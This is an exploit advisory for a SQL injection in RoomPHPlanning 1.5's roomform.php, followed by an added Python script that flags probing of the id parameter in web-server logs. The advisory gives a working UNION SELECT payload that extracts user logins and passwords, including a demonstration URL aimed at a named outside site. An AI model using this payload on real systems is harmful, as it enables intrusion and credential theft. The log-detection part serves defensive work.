[~] RoomPHPlanning 1.5 (roomform.php id) Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RoomPHPlanning
[~] site: http://www.beaussier.com/
[~] Vulnerability Class: SQL Injection
[~] Online Demonstration: http://www.hsbcorp.co.cc/hc/admin/roomform.php?id=-0x90+union+select+concat(LoginUs,0x3a,char(58),PwdUs),0x90,0x90,0x90,0x90,0x90+from+rp_user
[~] Exploit: http://host/admin/roomform.php?id=-0x90+union+select+concat(LoginUs,0x3a,char(58),PwdUs),0x90,0x90,0x90,0x90,0x90+from+rp_user
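
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access log lines for requests to roomform.php whose id parameter is not a plain integer. The combined log format, the sample lines and the integer-only rule for id are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is a plain non-negative integer.
PLAIN_ID_RE = re.compile(r"\d+")
SQL_HINT_RE = re.compile(r"\b(union|select|concat|from)\b", re.I)

def check_line(line):
    """Return None for a benign line, else a dict describing the finding."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/roomform.php"):
        return None
    # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET
    ids = parse_qs(url.query).get("id", [])
    bad = [v for v in ids if not PLAIN_ID_RE.fullmatch(v)]
    if not bad:
        return None
    hints = sorted({k.lower() for k in SQL_HINT_RE.findall(bad[0])})
    return {"value": bad[0], "sql_keywords": hints}

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = check_line(line)
        if finding:
            hits.append((n, finding))
    return hits

# Constructed sample log (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/roomform.php?id=12 HTTP/1.1" 200 2310',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /admin/roomform.php?id=-0x90+union+select+'
    'concat(LoginUs,0x3a,char(58),PwdUs),0x90,0x90,0x90,0x90,0x90+from+rp_user HTTP/1.1" 200 2298',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /admin/roomform.php?id=7%20UNION%20SELECT%201 HTTP/1.1" 200 2290',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /admin/index.php?id=abc HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(n, f["sql_keywords"], f["value"])
```

The same integer-only rule, enforced in the application before the value reaches a query, is what closes the injection; the log scan only shows whether the parameter has been probed.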